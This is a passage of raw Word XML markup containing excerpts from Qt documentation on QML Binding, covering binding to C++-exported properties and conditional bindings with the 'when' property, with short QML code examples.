        <w:t>Binding to an inaccessible property</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2560"/>
      <w:bookmarkEnd w:id="2561"/>
      <w:bookmarkEnd w:id="2562"/>
      <w:bookmarkEnd w:id="2563"/>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>necessary to bind an object's property to that of another object that isn't directly instantiated by QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>such as a property of a class exported to QML by C++.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use the Binding type to establish this dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; binding any value to any object's property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, in a C++ application that maps an "app.enteredText" property into QML, you can use Binding to update the enteredText property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">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E046D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextEdit</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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id</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myTextField</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text</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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Please type here..."</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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target</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app</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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"enteredText"</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value</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myTextField</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text </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changes, the C++ property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enteredText</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will update automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2564" w:name="_Toc483001090"/>
      <w:bookmarkStart w:id="2565" w:name="_Toc483004059"/>
      <w:bookmarkStart w:id="2566" w:name="_Toc483604425"/>
      <w:bookmarkStart w:id="2567" w:name="_Toc483605645"/>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Conditional bindings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2564"/>
      <w:bookmarkEnd w:id="2565"/>
      <w:bookmarkEnd w:id="2566"/>
      <w:bookmarkEnd w:id="2567"/>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In some cases you </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may want to modify the value of a property when a certain condition is met but leave it unmodified otherwise</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Often, it's not possible to do this with direct bindings, as you have to supply values for all possible branches</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the code snippet below results in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>warning</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> whenever you release the mouse. This is because the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value of the binding is undefined when</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the mouse isn't pressed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">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E046D">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// produces warning: "Unable to assign [undefined] to double value"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value</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w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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mouse</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pressed</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mouse</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mouseX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Binding type can prevent this warning</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">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E046D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on value </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">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E046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>when</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mouse</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pressed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">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EE046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    value</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 xml:space="preserve"> mouse</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mouseX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRPr="00EE046D" w:rsidRDefault="00EE046D" w:rsidP="00EE046D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Binding type </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA720E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>restores any previously set direct bindings on the property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE046D">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE046D" w:rsidRDefault="00490E7E" w:rsidP="00D77D11">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2797" w:history="1">
        <w:r w:rsidR="00DA720E" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-cppextensionpoints.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DA720E" w:rsidRPr="00DA720E" w:rsidRDefault="00DA720E" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2568" w:name="_Toc483001091"/>
      <w:bookmarkStart w:id="2569" w:name="_Toc483004060"/>
      <w:bookmarkStart w:id="2570" w:name="_Toc483604426"/>
